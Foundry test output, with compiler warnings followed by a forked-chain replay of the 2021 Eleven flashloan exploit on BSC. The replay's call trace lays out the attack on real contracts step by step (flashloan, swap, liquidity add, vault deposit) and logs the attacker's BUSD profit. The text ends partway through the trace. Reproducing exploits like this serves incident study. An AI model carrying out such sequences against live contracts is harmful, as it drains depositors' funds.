Compiling 21 files with Solc 0.8.28
Compiling 20 files with Solc 0.8.10
Solc 0.8.28 finished in 1.18s
Solc 0.8.10 finished in 1.21s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2021-06/Eleven_exp.sol:65:26:
   |
65 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                          ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2021-06/Eleven_exp.sol:65:42:
   |
65 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                          ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2021-06/Eleven_exp.sol:65:59:
   |
65 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                                           ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2021-06/Eleven_exp.sol:65:76:
   |
65 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                                                            ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.14s (3.61ms CPU time)

Ran 1 test for src/test/2021-06/Eleven_exp.sol:Eleven
[PASS] testExploit() (gas: 1098820)
Logs:
  -------Start exploit-------
  attacker BUSD balance before is 0
  received BUSD flashloan for 953869
  -------Finish exploit-------
  attacker BUSD balance after is 647573

Traces:
  [153650] Eleven::setUp()
    ├─ [0] VM::createSelectFork("bsc", 8530973 [8.53e6])
    │   └─ ← [Return] 0
    ├─ [24562] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   └─ ← [Return] true
    ├─ [24562] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::approve(0x51e6D27FA57373d8d4C256231241053a70Cb1d93, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x51e6D27FA57373d8d4C256231241053a70Cb1d93, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   └─ ← [Return] true
    ├─ [24586] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   └─ ← [Return] true
    ├─ [24598] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::approve(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   └─ ← [Return] true
    ├─ [24598] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   └─ ← [Return] true
    └─ ← [Stop]

  [1378790] Eleven::testExploit()
    ├─ [0] console::log("-------Start exploit-------") [staticcall]
    │   └─ ← [Stop]
    ├─ [2531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] console::log("attacker BUSD balance before is", 0) [staticcall]
    │   └─ ← [Stop]
    ├─ [0] VM::startPrank(0xc71e2F581b77De945C8A7A191b0B238c81f11eD6)
    │   └─ ← [Return]
    ├─ [1355122] 0x51e6D27FA57373d8d4C256231241053a70Cb1d93::swap(0, 953869628210538003222368 [9.538e23], Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x47696d6d65206461206c6f6f74)
    │   ├─ [27971] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transfer(Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 953869628210538003222368 [9.538e23])
    │   │   ├─ emit Transfer(from: 0x51e6D27FA57373d8d4C256231241053a70Cb1d93, to: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 953869628210538003222368 [9.538e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0x0971fc1a37c2ffb1d6875d8f062f5229192e868c1ad5d6c36193a75f16224e2b: 0x0000000000000000000000000000000000000000000332e84fc12735b20be8f7 → 0x0000000000000000000000000000000000000000000268eaef75379cd0211997
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000c9fd604bef98e1eacf60
    │   │   └─ ← [Return] true
    │   ├─ [1297795] Eleven::pancakeCall(0xc71e2F581b77De945C8A7A191b0B238c81f11eD6, 0, 953869628210538003222368 [9.538e23], 0x47696d6d65206461206c6f6f74)
    │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 953869628210538003222368 [9.538e23]
    │   │   ├─ [0] console::log("received BUSD flashloan for", 953869 [9.538e5]) [staticcall]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [96442] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokens(340631231201021740166440 [3.406e23], 474378756062092796179091 [4.743e23], [0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56, 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096], Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1624403177 [1.624e9])
    │   │   │   ├─ [2893] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 6418974696689822071606311 [6.418e24], 4257890390012771752080505 [4.257e24], 1624402467 [1.624e9]
    │   │   │   ├─ [15634] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transferFrom(Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd, 340631231201021740166440 [3.406e23])
    │   │   │   │   ├─ emit Transfer(from: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd, value: 340631231201021740166440 [3.406e23])
    │   │   │   │   ├─ emit Approval(owner: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640563698826352806891389473495 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x8bb7630b861534f3d3aad447fe81a0548b79c8e611dc240d52ecf7c18c91a2bf: 0x0000000000000000000000000000000000000000000385a4b3576e7ba26df479 → 0x00000000000000000000000000000000000000000003cdc65b49f2339af1a1a1
    │   │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffb7de580d7c48077c52d7
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000c9fd604bef98e1eacf60 → 0x0000000000000000000000000000000000000000000081dbb8596be0e9672238
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [66946] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::swap(474378756062092796179091 [4.743e23], 0, Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [30091] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::transfer(Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 474378756062092796179091 [4.743e23])
    │   │   │   │   │   ├─ emit Transfer(from: 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd, to: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 474378756062092796179091 [4.743e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb264a0c361b2673836727fd5e88d97870e16469493057b60c56722faf1d9194e: 0x000000000000000000000000000000000000000000054f4550c8cde1d8ed4c27 → 0x00000000000000000000000000000000000000000004ead1311135c6c5c41994
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000064741fb7981b13293293
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd) [staticcall]
    │   │   │   │   │   └─ ← [Return] 5944595940627729275427220 [5.944e24]
    │   │   │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd) [staticcall]
    │   │   │   │   │   └─ ← [Return] 4598521621213793492246945 [4.598e24]
    │   │   │   │   ├─ emit Sync(reserve0: 5944595940627729275427220 [5.944e24], reserve1: 4598521621213793492246945 [4.598e24])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 340631231201021740166440 [3.406e23], amount0Out: 474378756062092796179091 [4.743e23], amount1Out: 0, to: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x60d26a230000000385a4b3576e7ba26df479000000054f4550c8cde1d8ed4c27 → 0x60d26af500000003cdc65b49f2339af1a1a100000004ead1311135c6c5c41994
    │   │   │   │   │   @ 9: 0x000000000000000000000000000000bed9f58d191c48553009f8017a8a6506ad → 0x000000000000000000000000000000beda80d9a6ad96f54f5df1b68fdc601999
    │   │   │   │   │   @ 10: 0x0000000000000000000000000000002df7020272ab92006a328adb4b5009b3af → 0x0000000000000000000000000000002df83e983c4459e42d5ca454a41049f567
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return] [340631231201021740166440 [3.406e23], 474378756062092796179091 [4.743e23]]
    │   │   ├─ [109357] 0x10ED43C718714eb63d5aA57B78B54704E256024E::addLiquidity(0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096, 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56, 474378756062092796179091 [4.743e23], 366962025372860720681305 [3.669e23], 474378756062092796179091 [4.743e23], 366962025372860720681305 [3.669e23], Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1624403177 [1.624e9])
    │   │   │   ├─ [2676] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::getPair(0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096, 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56) [staticcall]
    │   │   │   │   └─ ← [Return] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd
    │   │   │   ├─ [893] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 5944595940627729275427220 [5.944e24], 4598521621213793492246945 [4.598e24], 1624402677 [1.624e9]
    │   │   │   ├─ [10837] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::transferFrom(Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd, 474378756062092796179091 [4.743e23])
    │   │   │   │   ├─ emit Transfer(from: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd, value: 474378756062092796179091 [4.743e23])
    │   │   │   │   ├─ emit Approval(owner: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640563565078827945820333460844 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x44bf1039324fcbfda472196706fa68525cb38db0f3d91f5ca7d489ff92357e45: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffff9b8be04867e4ecd6cd6c
    │   │   │   │   │   @ 0xb264a0c361b2673836727fd5e88d97870e16469493057b60c56722faf1d9194e: 0x00000000000000000000000000000000000000000004ead1311135c6c5c41994 → 0x000000000000000000000000000000000000000000054f4550c8cde1d8ed4c27
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000064741fb7981b13293293 → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [6034] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transferFrom(Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd, 366962025372860720681305 [3.669e23])
    │   │   │   │   ├─ emit Transfer(from: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd, value: 366962025372860720681305 [3.669e23])
    │   │   │   │   ├─ emit Approval(owner: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640563331864327434030668792190 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x8bb7630b861534f3d3aad447fe81a0548b79c8e611dc240d52ecf7c18c91a2bf: 0x00000000000000000000000000000000000000000003cdc65b49f2339af1a1a1 → 0x000000000000000000000000000000000000000000041b7b686916ae67aab2fa
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000081dbb8596be0e9672238 → 0x000000000000000000000000000000000000000000003426ab3a47661cae10df
    │   │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xffffffffffffffffffffffffffffffffffffffffffffb7de580d7c48077c52d7 → 0xffffffffffffffffffffffffffffffffffffffffffff6a294aee57cd3ac3417e
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [79738] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::mint(Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd) [staticcall]
    │   │   │   │   │   └─ ← [Return] 6418974696689822071606311 [6.418e24]
    │   │   │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd) [staticcall]
    │   │   │   │   │   └─ ← [Return] 4965483646586654212928250 [4.965e24]
    │   │   │   │   ├─ [2354] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::feeTo() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x07d80AE6f36A5E08Dca74cE884A24D39dB9934ed
    │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x07d80AE6f36A5E08Dca74cE884A24D39dB9934ed, value: 225051112259492242425 [2.25e20])
    │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 411515297079048812211459 [4.115e23])
    │   │   │   │   ├─ emit Sync(reserve0: 6418974696689822071606311 [6.418e24], reserve1: 4965483646586654212928250 [4.965e24])
    │   │   │   │   ├─ emit Mint(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0: 474378756062092796179091 [4.743e23], amount1: 366962025372860720681305 [3.669e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x52481eeb4fc6a18a5177a442f3f64a20db882d8cc8cc9f3c36884fd0498d40c0: 0x00000000000000000000000000000000000000000000004969b1ee2814cce83a → 0x0000000000000000000000000000000000000000000000559ce818627a64cc33
    │   │   │   │   │   @ 0: 0x0000000000000000000000000000000000000000000443f44b0a6bded69baaa6 → 0x000000000000000000000000000000000000000000049b24c8398e018be93ba2
    │   │   │   │   │   @ 11: 0x000000000000000000000012b2fe22d1e0b5a26a023cb3f39f4e8beb7f6213d0 → 0x000000000000000000000015cf00d3585a66d3970b6d78320355bb1d19957c16
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000572449f8f7e84fb5ad03
    │   │   │   │   │   @ 8: 0x60d26af500000003cdc65b49f2339af1a1a100000004ead1311135c6c5c41994 → 0x60d26af5000000041b7b686916ae67aab2fa000000054f4550c8cde1d8ed4c27
    │   │   │   │   └─ ← [Return] 411515297079048812211459 [4.115e23]
    │   │   │   └─ ← [Return] 474378756062092796179091 [4.743e23], 366962025372860720681305 [3.669e23], 411515297079048812211459 [4.115e23]
    │   │   ├─ [629224] 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8::depositAll()
    │   │   │   ├─ [537] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::balanceOf(Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 411515297079048812211459 [4.115e23]
    │   │   │   ├─ [2864] 0xAcD7B3D9c10e97d0efA418903C0c7669E702E4C0::balanceOf(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8) [staticcall]
    │   │   │   │   └─ ← [Return] 866216599017099835164 [8.662e20]
    │   │   │   ├─ [76804] 0x1ac6C0B955B6D7ACb61c9Bdf3EE98E0689e07B8A::deposit(179, 0)
    │   │   │   │   ├─ [2863] 0x3fEab282Db4762F369e4223Cd132bD5E0591E6F0::balanceOf(0x1ac6C0B955B6D7ACb61c9Bdf3EE98E0689e07B8A) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1000000000000000000 [1e18]
    │   │   │   │   ├─ [9937] 0xAcD7B3D9c10e97d0efA418903C0c7669E702E4C0::mint(0x0222c690a42Fbd2A75A50b442624099E42fb0f49, 0)
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x0222c690a42Fbd2A75A50b442624099E42fb0f49, value: 0)
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [5937] 0xAcD7B3D9c10e97d0efA418903C0c7669E702E4C0::mint(0x1ac6C0B955B6D7ACb61c9Bdf3EE98E0689e07B8A, 0)
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x1ac6C0B955B6D7ACb61c9Bdf3EE98E0689e07B8A, value: 0)
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [864] 0xAcD7B3D9c10e97d0efA418903C0c7669E702E4C0::balanceOf(0x1ac6C0B955B6D7ACb61c9Bdf3EE98E0689e07B8A) [staticcall]
    │   │   │   │   │   └─ ← [Return] 49713200914620457548978 [4.971e22]
    │   │   │   │   ├─ [4147] 0xAcD7B3D9c10e97d0efA418903C0c7669E702E4C0::transfer(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, 0)
    │   │   │   │   │   ├─ emit Transfer(from: 0x1ac6C0B955B6D7ACb61c9Bdf3EE98E0689e07B8A, to: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [11292] 0x3fEab282Db4762F369e4223Cd132bD5E0591E6F0::transferFrom(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, 0x1ac6C0B955B6D7ACb61c9Bdf3EE98E0689e07B8A, 0)
    │   │   │   │   │   ├─ emit Transfer(from: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, to: 0x1ac6C0B955B6D7ACb61c9Bdf3EE98E0689e07B8A, value: 0)
    │   │   │   │   │   ├─ emit Approval(owner: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, spender: 0x1ac6C0B955B6D7ACb61c9Bdf3EE98E0689e07B8A, value: 115792089237316195423570985008687907853269984665640564039456584007913129639935 [1.157e77])
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ emit Deposit(user: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, pid: 179, amount: 0)
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xf652222313e28459528d920b65115c16c04f3efc82aaedc97be59f3f377c100d: 0x0000000000000000000000000000000000000000000000000000000000821d70 → 0x0000000000000000000000000000000000000000000000000000000000822c1d
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [864] 0xAcD7B3D9c10e97d0efA418903C0c7669E702E4C0::balanceOf(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8) [staticcall]
    │   │   │   │   └─ ← [Return] 866216599017099835164 [8.662e20]
    │   │   │   ├─ [107447] 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E::deposit(7, 0)
    │   │   │   │   ├─ [2537] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::balanceOf(0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E) [staticcall]
    │   │   │   │   │   └─ ← [Return] 5152591854224645910309224 [5.152e24]
    │   │   │   │   ├─ [17309] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::mint(0x3168082c31Dc4B03AC752Fb43d1C3Bf8AE6EE9AE, 5399263413000000000 [5.399e18])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x3168082c31Dc4B03AC752Fb43d1C3Bf8AE6EE9AE, value: 5399263413000000000 [5.399e18])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 2: 0x0000000000000000000000000000000000000000003d9bcf1b53e518bd60e39c → 0x0000000000000000000000000000000000000000003d9bcf6641ee907201b59c
    │   │   │   │   │   │   @ 0x05f43f739f075f6aace14647dae5527dd17be3a2b0eefe15c4fdd36febade223: 0x0000000000000000000000000000000000000000000229dab2131c7489476bcc → 0x0000000000000000000000000000000000000000000229dafd0125ec3de83dcc
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [10509] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::mint(0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, 53992634130000000000 [5.399e19])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, value: 53992634130000000000 [5.399e19])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 2: 0x0000000000000000000000000000000000000000003d9bcf6641ee907201b59c → 0x0000000000000000000000000000000000000000003d9bd2538e4d3d8049e99c
    │   │   │   │   │   │   @ 0x80bc848f55b8b24f5a83c3458d16fa75c491cae34bbe2c2d38c5062e4b2f62d5: 0x0000000000000000000000000000000000000000000bff5546069cf87d6445d6 → 0x0000000000000000000000000000000000000000000bff583352fba58bac79d6
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E) [staticcall]
    │   │   │   │   │   └─ ← [Return] 14504014480666099347913174 [1.45e25]
    │   │   │   │   ├─ [25291] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::transfer(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, 189702238376885751474 [1.897e20])
    │   │   │   │   │   ├─ emit Transfer(from: 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, to: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, value: 189702238376885751474 [1.897e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x21e97b90a66a50d54b2497da418931efb3db76f3a0a5ba97e3e101e2e4373662: 0 → 0x00000000000000000000000000000000000000000000000a48a5bcb7dec00eb2
    │   │   │   │   │   │   @ 0x80bc848f55b8b24f5a83c3458d16fa75c491cae34bbe2c2d38c5062e4b2f62d5: 0x0000000000000000000000000000000000000000000bff583352fba58bac79d6 → 0x0000000000000000000000000000000000000000000bff4deaad3eedacec6b24
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [7576] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::transferFrom(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, 0)
    │   │   │   │   │   ├─ emit Transfer(from: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, to: 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ emit Deposit(user: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, pid: 7, amount: 0)
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x036b6384b5eca791c62761152d0c79bb0604c104a5fb6f4eb0703f3154bb3dce: 0x0000000000000000000000000000000000000000000000000000000000822bc6 → 0x0000000000000000000000000000000000000000000000000000000000822c1d
    │   │   │   │   │   @ 0x21e97b90a66a50d54b2497da418931efb3db76f3a0a5ba97e3e101e2e4373662: 0 → 0x00000000000000000000000000000000000000000000000a48a5bcb7dec00eb2
